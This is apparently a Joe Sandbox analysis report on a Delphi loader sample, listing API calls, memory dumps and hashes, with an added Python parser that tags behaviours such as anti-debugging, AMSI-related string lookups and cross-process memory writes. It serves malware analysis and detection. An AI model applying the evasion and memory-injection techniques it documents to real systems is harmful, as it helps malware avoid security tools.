                                                                                              • String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
                                                                                              • API String ID: 3386062106-51457883
                                                                                              • Opcode ID: 4b832500cbcb4570588aeb2a98ea4c3d143bb30cd73cf94f4af36b4e693206f6
                                                                                              • Instruction ID: 7458e346178a772d0656760dec84859f8210ea15a8c1682db5c6ceb67470a462
                                                                                              • Opcode Fuzzy Hash: 4b832500cbcb4570588aeb2a98ea4c3d143bb30cd73cf94f4af36b4e693206f6
                                                                                              • Instruction Fuzzy Hash: 48E21B38A142689FCB16FB65DC91BCEB3B9AF9D200F1041A5A055AF215DF30EE86CF51

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,031C0000,031EE790), ref: 031C5AE8
                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,031C0000,031EE790), ref: 031C5B06
                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,031C0000,031EE790), ref: 031C5B24
                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 031C5B42
                                                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,031C5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 031C5B8B
                                                                                              • RegQueryValueExA.ADVAPI32(?,031C5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,031C5BD1,?,80000001), ref: 031C5BA9
                                                                                              • RegCloseKey.ADVAPI32(?,031C5BD8,00000000,?,?,00000000,031C5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 031C5BCB
                                                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 031C5BE8
                                                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 031C5BF5
                                                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 031C5BFB
                                                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 031C5C26
                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 031C5C6D
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 031C5C7D
                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 031C5CA5
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 031C5CB5
                                                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 031C5CDB
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 031C5CEB
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
• Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                              • API String ID: 1759228003-2375825460
                                                                                              • Opcode ID: 40e88b139ba3392031f3d24379ca56672c24dc662797eb2a123ab211e22c1256
                                                                                              • Instruction ID: 5d78f8f275f8bf5ab6c9aa4494f4e4a1c591181ab43a53246d591aa16e5a458d
                                                                                              • Opcode Fuzzy Hash: 40e88b139ba3392031f3d24379ca56672c24dc662797eb2a123ab211e22c1256
                                                                                              • Instruction Fuzzy Hash: 43511975A5038C7FEB21D6E48C46FEFBBAD8B1D740F5401A9AA00E6082D774EE448B64

Control-flow Graph: [graph image not reproduced in text; basic blocks 31d894c-31d89c1]
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize,032473A8,031DA93C,UacScan), ref: 031D8960
                                                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 031D897A
                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize), ref: 031D89B6
                                                                                                • Part of subcall function 031D7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
• Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                                              • String ID: BCryptVerifySignature$bcrypt
                                                                                              • API String ID: 1002360270-4067648912
                                                                                              • Opcode ID: 62774bd1f197cc74897c5e3f9b2a7efe254c4761739e058e454944e54a18b9c4
                                                                                              • Instruction ID: 06c4ad8b4c82642ee281eb326bd2a625aac8e56c5b4a5efff63622b905aa33c8
                                                                                              • Opcode Fuzzy Hash: 62774bd1f197cc74897c5e3f9b2a7efe254c4761739e058e454944e54a18b9c4
                                                                                              • Instruction Fuzzy Hash: 45F0C2F96003546FD310FB6CBC8DF577F989799614F084529BD388B144E77028808B90

Control-flow Graph: [graph image not reproduced in text; basic blocks 31df744-31df792]
                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 031DF754
                                                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 031DF766
                                                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 031DF77D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
• Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                              • API String ID: 35162468-539270669
                                                                                              • Opcode ID: 7e6f95d51c7fdd2d6954dd32d2e1b57890512403d8bb5bdbb8cbbaf4678f01be
                                                                                              • Instruction ID: ec25450cbf4c0a9630cdd3f2ab76ecb63d90e87eca1e95a0c250c3d6e7553b1b
                                                                                              • Opcode Fuzzy Hash: 7e6f95d51c7fdd2d6954dd32d2e1b57890512403d8bb5bdbb8cbbaf4678f01be
                                                                                              • Instruction Fuzzy Hash: 89F0A070904298BFDB10E6F888887DDFBA89B1E225F284394A436A61C2E7750785C6A1

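The two listings above (the LoadLibraryW("bcrypt") / GetProcAddress("BCryptVerifySignature") routine whose subcall reaches NtWriteVirtualMemory, and the GetModuleHandleW("KernelBase") / GetProcAddress("CheckRemoteDebuggerPresent") routine) show the sample resolving its interesting imports at run time rather than through its import table, so they do not appear in a static import listing. The Python below is an added example, not Joe Sandbox or DBatLoader code: it parses the "APIs" line format used throughout this report, extracts the GetProcAddress targets, and tags a few behaviours that are visible in these listings. The rule names, and the heuristic that treats "?" and 8-hex-digit values as non-string arguments, are this example's own; the sample lines are copied from the listings above.

```python
"""Parse the per-function 'APIs' listing emitted by the Joe Sandbox IDA plugin
and flag behaviours visible in this report.  Added example, not Joe Sandbox code."""
import re

# A listing line looks like one of:
#   • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 031DF766
#   • Part of subcall function 031D7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
API_LINE = re.compile(
    r"^\s*(?:•\s*)?"
    r"(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>[\w.]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Heuristic (this example's assumption): '?' and bare 32-bit hex values are not strings.
HEX_OR_UNKNOWN = re.compile(r"^(?:\?|[0-9A-Fa-f]{8})$")


def parse_api_line(line):
    """Return a dict for one listing line, or None if the line is not an API record."""
    m = API_LINE.match(line)
    if not m:
        return None
    return {
        "api": m["api"],
        "module": m["mod"],
        "args": [a.strip() for a in m["args"].split(",")] if m["args"] else [],
        "ref": int(m["ref"], 16),
        "subcall": int(m["sub"], 16) if m["sub"] else None,
    }


def parse_listing(text):
    """Parse every API record in one function's listing, in order."""
    return [rec for rec in map(parse_api_line, text.splitlines()) if rec]


def string_args(call):
    """Arguments the plugin rendered as strings (registry paths, export names, DLL names)."""
    return [a for a in call["args"] if a and not HEX_OR_UNKNOWN.match(a)]


def dynamic_imports(calls):
    """Export names passed to GetProcAddress: imports resolved at run time."""
    names = []
    for c in calls:
        if c["api"] == "GetProcAddress" and len(c["args"]) >= 2:
            if not HEX_OR_UNKNOWN.match(c["args"][1]):
                names.append(c["args"][1])
    return names


# Behaviour tags for this report (names are this example's own).
RULES = {
    "anti_debug": lambda c: c["api"] == "CheckRemoteDebuggerPresent"
    or (c["api"] == "GetProcAddress" and "CheckRemoteDebuggerPresent" in c["args"]),
    # Software\Borland\Delphi\Locales is the Delphi RTL resource-module lookup.
    "delphi_rtl_locale_lookup": lambda c: c["api"].startswith("RegOpenKeyEx")
    and any(a.startswith("Software\\Borland\\") for a in c["args"]),
    "cross_process_write": lambda c: c["api"] == "NtWriteVirtualMemory",
    "native_file_io": lambda c: c["api"] in {"NtCreateFile", "NtWriteFile", "NtReadFile"},
    "connectivity_check": lambda c: c["api"] == "InternetCheckConnectionA",
    "create_process_as_user": lambda c: c["api"] == "CreateProcessAsUserW"
    or (c["api"] == "GetProcAddress" and "CreateProcessAsUserW" in c["args"]),
}


def classify(calls):
    """Sorted list of behaviour tags whose rule matches at least one call."""
    return sorted(tag for tag, rule in RULES.items() if any(rule(c) for c in calls))


# Sample input: lines copied from the two listings above.
SAMPLE_ANTIDEBUG = """\
• GetModuleHandleW.KERNEL32(KernelBase), ref: 031DF754
• GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 031DF766
• CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 031DF77D
"""
SAMPLE_BCRYPT = """\
• LoadLibraryW.KERNEL32(bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize,032473A8,031DA93C,UacScan), ref: 031D8960
• GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 031D897A
• FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,0000089C,00000000,032473A8,031DA587,ScanString,032473A8,031DA93C,ScanBuffer,032473A8,031DA93C,Initialize), ref: 031D89B6
  • Part of subcall function 031D7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D7DEC
"""

if __name__ == "__main__":
    for name, text in (("anti-debug", SAMPLE_ANTIDEBUG), ("bcrypt", SAMPLE_BCRYPT)):
        calls = parse_listing(text)
        print(name, dynamic_imports(calls), classify(calls))
```

The plugin prints stack slots beyond the API's real argument count, which is why the CheckRemoteDebuggerPresent line carries the "CheckRemoteDebuggerPresent" and "KernelBase" strings left over from the preceding GetProcAddress and GetModuleHandleW calls; string_args() therefore returns neighbouring stack contents as well as genuine arguments, and the ref addresses are what to use when matching a record back to the disassembly. The Software\Borland\Delphi\Locales lookup flagged by the delphi_rtl_locale_lookup rule is standard Delphi runtime behaviour and is consistent with the DBatLoader detection in the overview, not a malicious action in itself.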
                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 031C4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 031C4F2E
                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,031DDE40), ref: 031DDDAB
                                                                                              • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,031DDE40), ref: 031DDDDB
                                                                                              • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 031DDDF0
                                                                                              • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 031DDE1C
                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 031DDE25
                                                                                                • Part of subcall function 031C4C60: SysFreeString.OLEAUT32(031DF4A4), ref: 031C4C6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
• Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                                              • String ID:
                                                                                              • API String ID: 1897104825-0
                                                                                              • Opcode ID: a43fdb955202aac27b8ca7eafbf82ea7031f221eaab3bdb4a50a693b8774ea54
                                                                                              • Instruction ID: 614edaa1b4c7599aec5ab1eab7dec154e5afca6a9aa853780887663f52bfe84d
                                                                                              • Opcode Fuzzy Hash: a43fdb955202aac27b8ca7eafbf82ea7031f221eaab3bdb4a50a693b8774ea54
                                                                                              • Instruction Fuzzy Hash: 3021ED75A54308BBEB11EAA5DC52FDEB7BCAB4D700F500465B200EB180DBB4AA0487A5

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 031DE5F6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
• Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CheckConnectionInternet
                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                              • API String ID: 3847983778-3852638603
                                                                                              • Opcode ID: ffd8dd9293dfc52c02f3efecce634a2ac3ccf4ad757bfedd5ea25ff59f2b0ab9
                                                                                              • Instruction ID: 0e40350171209835a30e1584ea9de7ef1d84140dc78ecfb72953ada7cee321dd
                                                                                              • Opcode Fuzzy Hash: ffd8dd9293dfc52c02f3efecce634a2ac3ccf4ad757bfedd5ea25ff59f2b0ab9
                                                                                              • Instruction Fuzzy Hash: 51413E39B2835C9FDB12EBA5D851ADEB3B9EF9D601F204429E040AF244DF30AD018B65

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 031C4F20: SysAllocStringLen.OLEAUT32(?,?), ref: 031C4F2E
                                                                                              • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,031DDD5E), ref: 031DDCCB
                                                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 031DDD05
                                                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 031DDD32
                                                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 031DDD3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
• Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                                              • String ID:
                                                                                              • API String ID: 3764614163-0
                                                                                              • Opcode ID: 0aa1a385cf9fef4e70948dce89cde1942910bd7840328dbb30c49d6133781403
                                                                                              • Instruction ID: f510d48d5e02fd40ec4b40f88dc42b41cf0885feac7d5c3d08c84d85cda48653
                                                                                              • Opcode Fuzzy Hash: 0aa1a385cf9fef4e70948dce89cde1942910bd7840328dbb30c49d6133781403
                                                                                              • Instruction Fuzzy Hash: 0B210C75A54308BFEB21EAA4DC52FEEB3BCDF09B00F614465B610FB1C0DBB06A048665
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 031D8814
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
• Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                              • String ID: CreateProcessAsUserW$Kernel32
                                                                                              • API String ID: 3130163322-2353454454
                                                                                              • Opcode ID: b302c50c69f49f0a43aa59df760d5b1f4f441c3f8cd542ae497102ec5477f89e
                                                                                              • Instruction ID: c89fa44416b631fa59009a44820467f3d6bc040ca2600cf32d3bb1a73d2ad3b4
                                                                                              • Opcode Fuzzy Hash: b302c50c69f49f0a43aa59df760d5b1f4f441c3f8cd542ae497102ec5477f89e
                                                                                              • Instruction Fuzzy Hash: 1F11D3B6614248AFDB41EEADDC51F9A77ECEB4DA00F514024BA18D7200D734E9108B25
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031D7A9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                              • API String ID: 4072585319-445027087
                                                                                              • Opcode ID: 06d9509fb5f560ac682468ce7ed53237841a9b822b725dcafdbc52bdef527be4
                                                                                              • Instruction ID: 7cbffe35a13c661fc1b5b6faecba21afd8bbb6634b33e52cb15194b4c4cf93ed
                                                                                              • Opcode Fuzzy Hash: 06d9509fb5f560ac682468ce7ed53237841a9b822b725dcafdbc52bdef527be4
                                                                                              • Instruction Fuzzy Hash: 8C114479214348BFDB05EFA9EC51E9EB7ACEB4D600F514465B910DB640EB30AA04CB64
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 031D7A9F
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.0000000003247000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1726510733.000000000333E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_31c0000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                                              • API String ID: 4072585319-445027087
                                                                                              • Opcode ID: b410be5ef7a2bf21b68c339032f45269f7fda18c96d57d0b3f6ac79fc16425e3
                                                                                              • Instruction ID: 7f1741f267ec5ba9e096bdcf4ca7cac94a89f77189604d7751399979908eb2fd
                                                                                              • Opcode Fuzzy Hash: b410be5ef7a2bf21b68c339032f45269f7fda18c96d57d0b3f6ac79fc16425e3
                                                                                              • Instruction Fuzzy Hash: 0D114479214348BFDB05EF95EC51E9EB7ACEB4D600F514465B910DB640EB30AA04CB64
                                                                                              APIs
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,031D823C,?,?,00000000,?,031D7A7E,ntdll,00000000,00000000,031D7AC3,?,?,00000000), ref: 031D820A
                                                                                                • Part of subcall function 031D81CC: GetModuleHandleA.KERNELBASE(?), ref: 031D821E
                                                                                                • Part of subcall function 031D8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,031D82FC,?,?,00000000,00000000,?,031D8215,00000000,KernelBASE,00000000,00000000,031D823C), ref: 031D82C1
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 031D82C7
                                                                                                • Part of subcall function 031D8274: GetProcAddress.KERNEL32(?,?), ref: 031D82D9
                                                                                              • NtReadVirtualMemory.NTDLL(?,?,?,?,?), ref: 031D8471
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.1725304888.00000000031C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031C0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.1725278060.00000000031C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmpDownload File
